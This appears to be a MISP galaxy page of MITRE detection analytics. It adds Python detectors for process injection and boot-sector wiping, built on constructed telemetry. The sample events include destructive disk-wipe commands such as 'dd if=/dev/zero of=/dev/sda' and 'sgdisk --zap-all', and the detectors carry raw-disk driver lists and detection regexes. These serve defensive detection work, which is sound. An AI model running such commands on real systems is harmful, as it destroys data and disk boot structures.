Detects PE injection through a behavioral sequence where one process opens (OpenProcess) a handle to another, allocates remote memory (VirtualAllocEx), writes a PE header (MZ) or shellcode (WriteProcessMemory), then initiates a new thread (CreateRemoteThread or NtCreateThreadEx) in that process—executing injected code in memory without touching disk. Optional: injects a trampoline or shellcode that unpacks/reflectively maps the payload.

Internal MISP references

UUID d845dc30-6950-4f0c-9342-29b7a7315bd2 which can be used as unique global reference for Analytic 0297 - AN0297 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0297
mitre_platforms ['Windows']
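The API-sequence correlation behind AN0297 (PE injection) and AN0277 (APC queuing and thread-context hijacking), as an added example (not code from the MITRE analytics or the MISP galaxy): cross-process API calls are grouped by (source pid, target pid) and each ordered chain is matched within a time window, accepting either the Win32 or the Nt* form at every step. The telemetry records, the `data_prefix` field and the 10-second window are constructed assumptions; whether a sensor records the written bytes varies by product.

```python
from collections import defaultdict

# Ordered API-call chains; each step accepts any of the listed calls (Win32 or Nt*).
RULES = {
    "remote_thread_injection": [
        {"OpenProcess", "NtOpenProcess"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
    ],
    "apc_injection": [
        {"OpenProcess", "NtOpenProcess"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"QueueUserAPC", "NtQueueApcThread"},
    ],
    "thread_context_hijack": [
        {"OpenThread", "NtOpenThread"},
        {"SuspendThread", "NtSuspendThread"},
        {"SetThreadContext", "NtSetContextThread"},
        {"ResumeThread", "NtResumeThread"},
    ],
}

# Constructed API telemetry (as an EDR hook or ETW provider might emit), not real data.
# data_prefix: first bytes handed to the write call, when the sensor records them.
SAMPLE_API_EVENTS = [
    {"ts": 1.0, "pid": 4312, "image": "upd.exe", "target_pid": 812, "api": "OpenProcess"},
    {"ts": 1.1, "pid": 4312, "image": "upd.exe", "target_pid": 812, "api": "VirtualAllocEx"},
    {"ts": 1.2, "pid": 4312, "image": "upd.exe", "target_pid": 812, "api": "WriteProcessMemory", "data_prefix": "MZ"},
    {"ts": 1.3, "pid": 4312, "image": "upd.exe", "target_pid": 812, "api": "CreateRemoteThread"},
    {"ts": 5.0, "pid": 5000, "image": "a.exe", "target_pid": 2200, "api": "NtOpenProcess"},
    {"ts": 5.1, "pid": 5000, "image": "a.exe", "target_pid": 2200, "api": "NtAllocateVirtualMemory"},
    {"ts": 5.2, "pid": 5000, "image": "a.exe", "target_pid": 2200, "api": "NtWriteVirtualMemory", "data_prefix": "\xfcH"},
    {"ts": 5.3, "pid": 5000, "image": "a.exe", "target_pid": 2200, "api": "NtQueueApcThread"},
    {"ts": 9.0, "pid": 6100, "image": "dbg.exe", "target_pid": 7000, "api": "OpenProcess"},
    {"ts": 9.1, "pid": 6100, "image": "dbg.exe", "target_pid": 7000, "api": "VirtualAllocEx"},
    {"ts": 9.2, "pid": 6100, "image": "dbg.exe", "target_pid": 7000, "api": "WriteProcessMemory", "data_prefix": "\x00\x00"},
    {"ts": 20.0, "pid": 8000, "image": "slow.exe", "target_pid": 8100, "api": "OpenProcess"},
    {"ts": 20.5, "pid": 8000, "image": "slow.exe", "target_pid": 8100, "api": "VirtualAllocEx"},
    {"ts": 21.0, "pid": 8000, "image": "slow.exe", "target_pid": 8100, "api": "WriteProcessMemory", "data_prefix": "\xfcH"},
    {"ts": 45.0, "pid": 8000, "image": "slow.exe", "target_pid": 8100, "api": "CreateRemoteThread"},
]


def match_sequence(events, steps, window_s):
    """Events completing `steps` in order within window_s of the first step, else None."""
    for start_idx, start in enumerate(events):
        if start["api"] not in steps[0]:
            continue
        matched, step = [start], 1
        for ev in events[start_idx + 1:]:
            if ev["ts"] - start["ts"] > window_s:
                break
            if ev["api"] in steps[step]:
                matched.append(ev)
                step += 1
                if step == len(steps):
                    return matched
    return None


def detect_injection(events, window_s=10.0):
    """Group cross-process API calls by (source pid, target pid) and test each rule."""
    pairs = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["target_pid"] != ev["pid"]:          # self-allocation is not injection
            pairs[(ev["pid"], ev["target_pid"])].append(ev)
    alerts = []
    for (src, dst), chain in pairs.items():
        for rule, steps in RULES.items():
            matched = match_sequence(chain, steps, window_s)
            if matched is None:
                continue
            alerts.append({
                "rule": rule, "source_pid": src, "source_image": matched[0]["image"], "target_pid": dst,
                "wrote_pe_header": any(e.get("data_prefix", "").startswith("MZ") for e in matched),
                "span_s": round(matched[-1]["ts"] - matched[0]["ts"], 2),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_injection(SAMPLE_API_EVENTS):
        print(alert)
```

The `dbg.exe` chain never creates a thread and stays silent, which is the expected behaviour for debuggers and some legitimate instrumentation; the `slow.exe` chain completes only when the window is widened, showing the trade-off the window introduces against injectors that pause between steps. Thread hijacking through `SetThreadContext` is matched by the third rule when the sensor reports thread-level calls with the owning process as `target_pid`.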

Analytic 0792 - AN0792

Monitor for anomalous email activity originating from Windows-hosted applications (e.g., Outlook) where the sending account name or display name does not match the underlying SMTP address. Detect abnormal volume of outbound messages containing sensitive keywords (e.g., 'payment', 'wire transfer') or anomalous login locations for accounts associated with email sending activity.

Internal MISP references

UUID e4246c20-fbe4-4750-a29e-44e3fe179bf2 which can be used as unique global reference for Analytic 0792 - AN0792 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0792
mitre_platforms ['Windows']

Analytic 0279 - AN0279

Detects invocation of lua or luajit interpreters by users or services outside of expected packages, chained with script drop or memory artifacts.

Internal MISP references

UUID f8e77c9a-2b8c-47d2-b44a-23857d246016 which can be used as unique global reference for Analytic 0279 - AN0279 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0279
mitre_platforms ['Linux']

Analytic 0828 - AN0828

Execution of utilities (dd, hdparm, sgdisk) or custom binaries attempting to overwrite disk boot structures (/dev/sda MBR sector or partition tables). Detection correlates shell execution with syscalls writing to sector 0 or disk metadata blocks.

Internal MISP references

UUID 538707d4-df45-489b-97f5-0115802a701f which can be used as unique global reference for Analytic 0828 - AN0828 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0828
mitre_platforms ['Linux']

Analytic 0288 - AN0288

Detects modification of PAM configuration files, unauthorized new PAM modules, and suspicious process execution accessing PAM-related binaries. Correlates file modification events in /etc/pam.d/ with process execution of unauthorized binaries.

Internal MISP references

UUID 776b9173-cbe0-4d1e-8ac9-af19b3db9dd7 which can be used as unique global reference for Analytic 0288 - AN0288 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0288
mitre_platforms ['Linux']

Analytic 0882 - AN0882

Processes attempting raw disk access via \\.\PhysicalDrive paths, abnormal file I/O to MBR/boot sectors, or loading of third-party drivers (e.g., RawDisk) that enable disk overwrite. Correlate process creation, privilege usage, and disk modification events within a short time window.

Internal MISP references

UUID d1ad1b0b-0050-4737-8993-73c2da8d143b which can be used as unique global reference for Analytic 0882 - AN0882 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0882
mitre_platforms ['Windows']
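The raw-device correlation behind AN0827 and AN0882 (Windows `\\.\PhysicalDriveN` access, raw-disk driver loads) and AN0828 (Linux `dd`/`sgdisk`/`wipefs` against whole-disk devices), as an added example (not code from the MITRE analytics or the MISP galaxy): it classifies command lines by platform, ties raw sector writes and driver loads back to the creating process within a window, and scales severity by whether the process was elevated. The event records, the window and the driver filename list are constructed assumptions; the driver names come from public wiper reporting and should be maintained locally.

```python
import re

WIN_RAW_DEVICE = re.compile(r"\\\\\.\\(?:PhysicalDrive\d+|[A-Za-z]:)", re.I)
LINUX_WHOLE_DISK = re.compile(r"/dev/(?:sd[a-z]|vd[a-z]|hd[a-z]|nvme\d+n\d+)\b")
# Third-party drivers that give user mode raw disk access (assumed list, from public reporting).
RAW_DISK_DRIVERS = {"elrawdsk.sys", "rawdisk.sys"}

# Constructed event stream (process creation, raw device writes, driver loads); not real telemetry.
SAMPLE_EVENTS = [
    {"type": "process", "ts": 10.0, "os": "windows", "pid": 5120, "elevated": True,
     "image": r"C:\Users\bob\AppData\Local\Temp\upd.exe", "cmdline": "upd.exe --quiet"},
    {"type": "raw_write", "ts": 11.5, "pid": 5120, "target": r"\\.\PhysicalDrive0", "offset": 0, "length": 512},
    {"type": "process", "ts": 20.0, "os": "windows", "pid": 6100, "elevated": True,
     "image": r"C:\Windows\Temp\svc.exe", "cmdline": "svc.exe"},
    {"type": "driver_load", "ts": 20.4, "pid": 6100, "driver": "elrawdsk.sys"},
    {"type": "process", "ts": 30.0, "os": "windows", "pid": 7000, "elevated": True,
     "image": r"C:\tools\dd.exe", "cmdline": r"dd.exe if=C:\tmp\mbr.bin of=\\.\PhysicalDrive0 bs=512 count=1"},
    {"type": "process", "ts": 40.0, "os": "linux", "pid": 3344, "elevated": True,
     "image": "/usr/bin/dd", "cmdline": "dd if=/dev/zero of=/dev/sda bs=512 count=1"},
    {"type": "process", "ts": 41.0, "os": "linux", "pid": 3345, "elevated": True,
     "image": "/usr/bin/dd", "cmdline": "dd if=/dev/sda of=/backup/disk.img bs=4M"},   # read, not write
    {"type": "process", "ts": 42.0, "os": "linux", "pid": 3347, "elevated": False,
     "image": "/usr/sbin/sgdisk", "cmdline": "sgdisk --zap-all /dev/nvme0n1"},
]


def classify_command(cmdline, os_name):
    """Reasons a command line looks like a boot-structure overwrite (empty list if none)."""
    reasons = []
    if os_name == "windows":
        for m in WIN_RAW_DEVICE.finditer(cmdline):
            reasons.append("command line references raw device " + m.group(0))
        return reasons
    dd = re.search(r"\bdd\b.*\bof=(/dev/(?:sd[a-z]|vd[a-z]|hd[a-z]|nvme\d+n\d+))\b", cmdline)
    if dd:
        seek = re.search(r"\bseek=(\d+)", cmdline)
        where = "sector 0" if seek is None or seek.group(1) == "0" else "seek=" + seek.group(1)
        reasons.append("dd to whole disk %s starting at %s" % (dd.group(1), where))
    for pattern, label in [
        (r"\bsgdisk\b.*(?:--zap-all|--zap|\s-Z)\b", "sgdisk partition table wipe"),
        (r"\bwipefs\b.*\s-a\b", "wipefs signature wipe"),
        (r"\bshred\b.*/dev/", "shred of a block device"),
        (r"\bhdparm\b.*--security-erase", "hdparm secure erase"),
        (r">\s*" + LINUX_WHOLE_DISK.pattern, "shell redirection onto whole disk"),
    ]:
        if re.search(pattern, cmdline):
            reasons.append(label)
    return reasons


def detect_boot_structure_tampering(events, window_s=30.0):
    """One finding per process, built from its command line, raw writes it issued
    within window_s of starting, and raw-disk driver loads attributed to it."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = {}

    def add(pid, reason):
        proc = procs.get(pid)
        if proc is None:
            return
        entry = findings.setdefault(pid, {
            "pid": pid, "os": proc["os"], "image": proc["image"],
            "severity": "high" if proc["elevated"] else "medium", "reasons": []})
        entry["reasons"].append(reason)

    for ev in events:
        if ev["type"] == "process":
            for reason in classify_command(ev["cmdline"], ev["os"]):
                add(ev["pid"], reason)
        elif ev["type"] == "raw_write":
            proc = procs.get(ev["pid"])
            is_raw = WIN_RAW_DEVICE.search(ev["target"]) or LINUX_WHOLE_DISK.search(ev["target"])
            if proc and is_raw and 0 <= ev["ts"] - proc["ts"] <= window_s:
                region = "sector 0 / MBR" if ev["offset"] == 0 else "offset %d" % ev["offset"]
                add(ev["pid"], "raw write to %s at %s" % (ev["target"], region))
        elif ev["type"] == "driver_load" and ev["driver"].lower() in RAW_DISK_DRIVERS:
            add(ev["pid"], "raw-disk driver loaded: " + ev["driver"])
    return list(findings.values())


if __name__ == "__main__":
    for finding in detect_boot_structure_tampering(SAMPLE_EVENTS):
        print(finding)
```

The `upd.exe` case shows why the command line alone is not enough: its arguments are innocuous and only the raw write event (a Sysmon-style raw access or a kernel file-system trace) ties it to sector 0. Writes to a partition (`/dev/sda1`) are deliberately not matched by the whole-disk pattern; they warrant their own rule with a different severity, since they cannot reach the MBR or the GPT header.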

Analytic 0928 - AN0928

Shell scripts or binaries implement custom mapping tables (tr/sed/awk/golang/rust/python encode loops), or emit long high-entropy tokens that fail Base64/Hex validation → correlated with egress showing asymmetric flow, protocol-mismatch payloads, or DNS/HTTP bodies containing low-diversity-but-long custom alphabets.

Internal MISP references

UUID 09125bb1-29eb-4d40-994a-2e1aa7bcd105 which can be used as unique global reference for Analytic 0928 - AN0928 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0928
mitre_platforms ['Linux']

Analytic 0892 - AN0892

Changes to security configurations such as disabling MFA requirements, extending session token lifetimes, or turning off risk-based policies. Correlate admin logins with sudden policy downgrades.

Internal MISP references

UUID 0ba25127-85e4-46ef-8173-96aa9df90c22 which can be used as unique global reference for Analytic 0892 - AN0892 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0892
mitre_platforms ['Identity Provider']

Analytic 0982 - AN0982

Use of tools like xwd or ImageMagick's import to capture screenshots, especially under non-GUI parent processes.

Internal MISP references

UUID 121a5310-3157-47b1-925e-998767c0ec06 which can be used as unique global reference for Analytic 0982 - AN0982 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0982
mitre_platforms ['Linux']

Analytic 0829 - AN0829

Abnormal invocation of diskutil or asr that modifies partition tables or initializes raw devices. Monitor for IOKit system calls targeting disk headers or EFI boot sectors, correlated with elevated privileges.

Internal MISP references

UUID 575a9c01-6dac-4513-86ca-e80b6e485212 which can be used as unique global reference for Analytic 0829 - AN0829 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0829
mitre_platforms ['macOS']

Analytic 0298 - AN0298

Correlation of inbound emails with embedded links followed by user-driven browser navigation to suspicious or obfuscated domains. Detection chain includes malicious URL in email → user click recorded in Office logs → browser process spawning unusual child processes (e.g., PowerShell, cmd) or download activity.

Internal MISP references

UUID a39fccda-e5ea-49de-80f9-d67ae3b8c799 which can be used as unique global reference for Analytic 0298 - AN0298 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0298
mitre_platforms ['Windows']

Analytic 0289 - AN0289

Detects unauthorized additions or changes to /Library/Security/SecurityAgentPlugins and suspicious process activity attempting to hook authentication APIs. Correlates file modifications with abnormal plugin loads in authentication flows.

Internal MISP references

UUID ee0f60f3-2fb3-4857-b02e-58c69b5aab52 which can be used as unique global reference for Analytic 0289 - AN0289 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0289
mitre_platforms ['macOS']

Analytic 0992 - AN0992

Detect suspicious file creations and process executions triggered by browser activity (e.g., injected payloads written to %AppData% or Temp directories, then executed). Correlate network anomalies with subsequent local process creation or script execution.

Internal MISP references

UUID 8384d942-2f83-4968-9959-fd2f55afb311 which can be used as unique global reference for Analytic 0992 - AN0992 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0992
mitre_platforms ['Windows']

Analytic 0929 - AN0929

EndpointSecurity/Unified Logs show processes generating custom alphabets or long high-entropy, non-standard tokens → network logs (PF/Zeek/EDR) show asymmetric beacons, protocol mismatches, or periodic fixed-size posts.

Internal MISP references

UUID bdc546bb-9d92-489e-8aa8-8de1bd08f320 which can be used as unique global reference for Analytic 0929 - AN0929 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0929
mitre_platforms ['macOS']

Analytic 0299 - AN0299

Detection of spearphishing links through mail logs and browser activity. Behavior includes email with suspicious URLs → user click recorded in mail/web proxy logs → shell or interpreter launched from browser process.

Internal MISP references

UUID e08e4dd6-cab5-41c0-b136-1bc8426c25ed which can be used as unique global reference for Analytic 0299 - AN0299 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0299
mitre_platforms ['Linux']

Analytic 0333 - AN0333

Detects manipulation of PNG, JPG, or GIF files by user-initiated scripts followed by script execution or exfiltration behavior, especially from osascript, python, or bash, in combination with LaunchAgent persistence or curl activity.

Internal MISP references

UUID eb5334b4-8a19-4efd-a225-44a2783c6d39 which can be used as unique global reference for Analytic 0333 - AN0333 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0333
mitre_platforms ['macOS']

Analytic 0433 - AN0433

Interactive or remote shell/API invocation of esxcli system clock get or querying time parameters via hostd/vpxa shortly followed by time/ntp configuration checks or scheduled task creation, executed by non-standard accounts or outside maintenance windows.

Internal MISP references

UUID 2e51d33e-28d3-4e3f-a68a-38bc2d4abdde which can be used as unique global reference for Analytic 0433 - AN0433 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0433
mitre_platforms ['ESXi']

Analytic 0343 - AN0343

Detects mounted external devices (via /media or /mnt) followed by large file read or copy operations by shell scripts, unauthorized users, or staging tools (e.g., tar, rsync).

Internal MISP references

UUID 4e288214-93b3-48a7-b51e-2b0136db8540 which can be used as unique global reference for Analytic 0343 - AN0343 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0343
mitre_platforms ['Linux']

Analytic 0334 - AN0334

Correlated user account modification (reset, disable, deletion) events with anomalous process lineage (e.g., PowerShell or net.exe from an interactive session), especially outside of IT admin change windows or by non-admin users.

Internal MISP references

UUID 7d0595b9-eca7-488d-bbc2-ed02ff4ced9b which can be used as unique global reference for Analytic 0334 - AN0334 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0334
mitre_platforms ['Windows']

Analytic 0335 - AN0335

Password changes or account deletions via 'passwd', 'userdel', or 'chage' preceded by interactive shell or remote command execution from non-privileged accounts.

Internal MISP references

UUID a941dd04-5626-4091-9eed-300d7d7f0a1f which can be used as unique global reference for Analytic 0335 - AN0335 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0335
mitre_platforms ['Linux']

Analytic 0353 - AN0353

Direct modification of /etc/ssh/keys-/authorized_keys or enabling public key authentication in sshd_config.

Internal MISP references

UUID e5b0d0ab-a464-4e9f-a1c0-dfb08a6ef53f which can be used as unique global reference for Analytic 0353 - AN0353 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0353
mitre_platforms ['ESXi']

Analytic 0533 - AN0533

Use of pbpaste, AppleScript, or third-party automation frameworks (e.g., Automator) to collect clipboard or file content in bursts. Observable via unified logs.

Internal MISP references

UUID f6ad51e5-b869-455d-acb1-ef725acb27cb which can be used as unique global reference for Analytic 0533 - AN0533 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0533
mitre_platforms ['macOS']

Analytic 0363 - AN0363

Adversary enumeration of domain accounts using net.exe, PowerShell, WMI, or LDAP queries from non-domain controllers or non-admin endpoints.

Internal MISP references

UUID 8f0ac116-4c8a-4819-b7c0-744e05d672c9 which can be used as unique global reference for Analytic 0363 - AN0363 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0363
mitre_platforms ['Windows']

Analytic 0633 - AN0633

Processes initiating outbound connections on uncommon ports or using protocols inconsistent with the assigned port. Correlating process creation with subsequent network connections reveals anomalies such as svchost.exe or Office applications using high, atypical ports.

Internal MISP references

UUID 9ea7f21e-700f-4900-a1d4-dfc171d399fe which can be used as unique global reference for Analytic 0633 - AN0633 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0633
mitre_platforms ['Windows']

Analytic 0336 - AN0336

Execution of dscl or sysadminctl commands to disable, delete, or modify users combined with anomalous process ancestry or terminal session launch.

Internal MISP references

UUID adbe8ef2-15e5-4fb9-83d8-4c67b7b1be78 which can be used as unique global reference for Analytic 0336 - AN0336 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0336
mitre_platforms ['macOS']

Analytic 0337 - AN0337

Invocation of esxcli 'system account remove' from vCLI, SSH, or vSphere API with anomalous user access or outside maintenance windows.

Internal MISP references

UUID 2c5d3103-2b9c-4b56-b415-c01e055fff64 which can be used as unique global reference for Analytic 0337 - AN0337 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0337
mitre_platforms ['ESXi']

Analytic 0733 - AN0733

Detects JavaScript execution through WSH (wscript.exe, cscript.exe) or HTA (mshta.exe), particularly when spawned from Office macros, web browsers, or abnormal user paths. Correlates script execution with outbound network activity or system modification.

Internal MISP references

UUID 3f257014-01d4-487d-980c-77d4d2130315 which can be used as unique global reference for Analytic 0733 - AN0733 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0733
mitre_platforms ['Windows']

Analytic 0373 - AN0373

File lock acquired via open() + flock() or lockf() on predictable path (e.g., /tmp/.lock123) followed by conditional early exit or divergent process behavior.

Internal MISP references

UUID 7c0e4ffa-7f95-41de-9e3b-de2ad4a7a9ae which can be used as unique global reference for Analytic 0373 - AN0373 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0373
mitre_platforms ['Linux']

Analytic 0833 - AN0833

Detects invocation of macOS-native archiving utilities (zip, ditto, hdiutil) or openssl used for encryption. Correlates execution with archive or encrypted file creation (.zip, .dmg, .tar.gz) in user or temporary directories. Identifies anomalous use of archiving commands by Office applications or daemons.

Internal MISP references

UUID 18cf5cf7-f46b-4258-a0aa-503881c9c88e which can be used as unique global reference for Analytic 0833 - AN0833 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0833
mitre_platforms ['macOS']

Analytic 0338 - AN0338

O365 UnifiedAuditLog entries for Remove-Mailbox or Set-Mailbox with account disable or delete actions correlated with suspicious login locations or MFA bypass.

Internal MISP references

UUID ba6c8c55-ee38-4219-a426-a3f1e04c7a8a which can be used as unique global reference for Analytic 0338 - AN0338 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0338
mitre_platforms ['Office Suite']

Analytic 0383 - AN0383

Detection of unauthorized modification of Active Directory SID-History attributes to escalate privileges. This chain involves: (1) privileged operations or API calls to DsAddSidHistory or related AD modification functions, (2) observed attribute changes in SID-History (Event ID 5136), (3) new logon sessions where the token includes unexpected or privileged SID-History values, and (4) follow-on resource access using elevated privileges derived from SID-History injection.

Internal MISP references

UUID c061d938-cafa-4e9d-8729-29d63ba633ad which can be used as unique global reference for Analytic 0383 - AN0383 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0383
mitre_platforms ['Windows']

Analytic 0393 - AN0393

Detects deletion of suspicious files (e.g., payloads, temp exes, scripts) via rm, unlink, or secure deletion tools like shred, especially when performed by unexpected users or shortly after execution.

Internal MISP references

UUID 874f0437-1aab-4cfe-a30a-7586c0602b6f which can be used as unique global reference for Analytic 0393 - AN0393 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0393
mitre_platforms ['Linux']

Analytic 0339 - AN0339

Deletion or disablement of user accounts in platforms like Okta, Salesforce, or Zoom with anomalies in admin session attributes or mass actions within short duration.

Internal MISP references

UUID af7bff30-45c5-4baf-9ced-68208b7ae836 which can be used as unique global reference for Analytic 0339 - AN0339 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0339
mitre_platforms ['SaaS']

Analytic 0933 - AN0933

Process chains that use native utilities (vssadmin, wbadmin, diskshadow, bcdedit, REAgentC, wmic) with arguments to delete shadow copies, disable recovery, or remove backup catalogs.

Internal MISP references

UUID decb2be7-1a0a-46dd-ab48-cf6258c0185e which can be used as unique global reference for Analytic 0933 - AN0933 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0933
mitre_platforms ['Windows']

Analytic 0443 - AN0443

Automated and repetitive triggering of SMS messages through OTP/account verification fields on SaaS platforms, leveraging background messaging APIs such as Twilio, AWS SNS, or Amazon Cognito to generate traffic toward attacker-controlled numbers.

Internal MISP references

UUID 5beb62fd-7dac-485f-828c-72cf151124a8 which can be used as unique global reference for Analytic 0443 - AN0443 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0443
mitre_platforms ['SaaS']

Analytic 0434 - AN0434

Non-standard or rare users/locations issue CLI commands like "show clock detail" or "show timezone"; optionally followed by configuration of time/timezone or NTP sources. AAA/TACACS+ accounting and syslog correlate execution to identity, source IP, and privilege level.

Internal MISP references

UUID 99ab1534-79b5-4660-83ed-3604bcb320f2 which can be used as unique global reference for Analytic 0434 - AN0434 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0434
mitre_platforms ['Network Devices']

Analytic 0344 - AN0344

Detects mounting of external volumes followed by high-volume or sensitive file access via Finder, terminal, or third-party apps (e.g., rsync, zip).

Internal MISP references

UUID acaabb0b-6cfc-45cd-8bd9-08ad49e1096c which can be used as unique global reference for Analytic 0344 - AN0344 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0344
mitre_platforms ['macOS']

Analytic 0534 - AN0534

Suspicious sign-ins to Graph API or sensitive resources using non-browser scripting agents (e.g., Python, PowerShell), often for programmatic access to mailbox or OneDrive content.

Internal MISP references

UUID 00b2801f-752e-4b70-95fd-c2644ccef671 which can be used as unique global reference for Analytic 0534 - AN0534 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0534
mitre_platforms ['SaaS']

Analytic 0354 - AN0354

Use of CLI commands such as ip ssh pubkey-chain to bind SSH keys to privileged accounts on routers or switches.

Internal MISP references

UUID 4d8e89c0-fbde-43fc-adc4-d2f50bec3193 which can be used as unique global reference for Analytic 0354 - AN0354 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0354
mitre_platforms ['Network Devices']

Analytic 0345 - AN0345

Process invokes a standard encoder (e.g., PowerShell -enc, certutil -encode, base64 via .NET/Invoke-Expression) or emits long Base64/hex literals → shortly followed by outbound network egress with high bytes_out:bytes_in ratio or HTTP headers/payloads containing Base64/MIME blocks.

Internal MISP references

UUID 861ee805-c979-44c9-8b0c-86bd3a6f5872 which can be used as unique global reference for Analytic 0345 - AN0345 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0345
mitre_platforms ['Windows']

Analytic 0543 - AN0543

Detects registry and Group Policy modifications that disable or weaken MFA, suspicious PowerShell usage modifying MFA-related attributes, and anomalous login sessions succeeding without expected MFA challenge.

Internal MISP references

UUID 97cb8df9-f100-4a64-802a-1aa2f45c26eb which can be used as unique global reference for Analytic 0543 - AN0543 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0543
mitre_platforms ['Windows']

Analytic 0435 - AN0435

Detection focuses on adversaries placing or modifying malicious dylibs in locations searched by legitimate applications. From the defender’s perspective, observable patterns include unexpected creation or modification of dylib files in application bundle paths, unusual module loads by processes compared to historical baselines, and execution of applications loading dylibs from suspicious directories (e.g., /tmp, user-controlled paths). Correlation across file system changes, process execution, and module loads provides high-fidelity detection.

Internal MISP references

UUID a1e502e2-d940-4c71-9eac-893e7a3025e3 which can be used as unique global reference for Analytic 0435 - AN0435 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0435
mitre_platforms ['macOS']

Analytic 0453 - AN0453

Detect anomalous OAuth or SSO logins that repeatedly generate MFA challenges, particularly where MFA approvals are denied or timed out by the user.

Internal MISP references

UUID e96b0210-f7d5-43ac-bf73-893f243f6015 which can be used as unique global reference for Analytic 0453 - AN0453 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0453
mitre_platforms ['SaaS']

Analytic 0364 - AN0364

Domain account enumeration using ldapsearch, samba tools (e.g., 'wbinfo -u'), or winbindd lookups.

Internal MISP references

UUID 4bad86cf-6cab-46f4-8748-28dc8c8ec81b which can be used as unique global reference for Analytic 0364 - AN0364 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0364
mitre_platforms ['Linux']

Analytic 0346 - AN0346

Shell/utility (base64, xxd -p, od, openssl enc -base64, python/perl base64 libraries) encodes data → subsequent outbound connections (curl/wget/bash TCP, socat, python requests) with high asymmetry or Base64/MIME blobs in HTTP/DNS payloads.

Internal MISP references

UUID 904100f0-1af9-4ded-89be-dfda7180bcbc which can be used as unique global reference for Analytic 0346 - AN0346 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0346
mitre_platforms ['Linux']

Analytic 0436 - AN0436

Unusual processes (e.g., powershell.exe, wscript.exe, mshta.exe) posting data to webhook endpoints (Discord, Slack, webhook.site) using HTTP POST/PUT requests. Defender perspective: suspicious process lineage followed by outbound HTTPS traffic to webhook domains.

Internal MISP references

UUID 98bd8e15-68ea-43a3-982b-66fcd1142c9a which can be used as unique global reference for Analytic 0436 - AN0436 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0436
mitre_platforms ['Windows']

Analytic 0643 - AN0643

Detects execution of binaries signed with unusual or recently issued certificates, correlation of process execution with abnormal publisher metadata, and mismatched certificate chains. Monitors for revoked or unknown code signing certificates used in high-privilege contexts.

Internal MISP references

UUID b5d77678-fff4-41cd-9e77-d3f82243240a which can be used as unique global reference for Analytic 0643 - AN0643 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0643
mitre_platforms ['Windows']

Analytic 0463 - AN0463

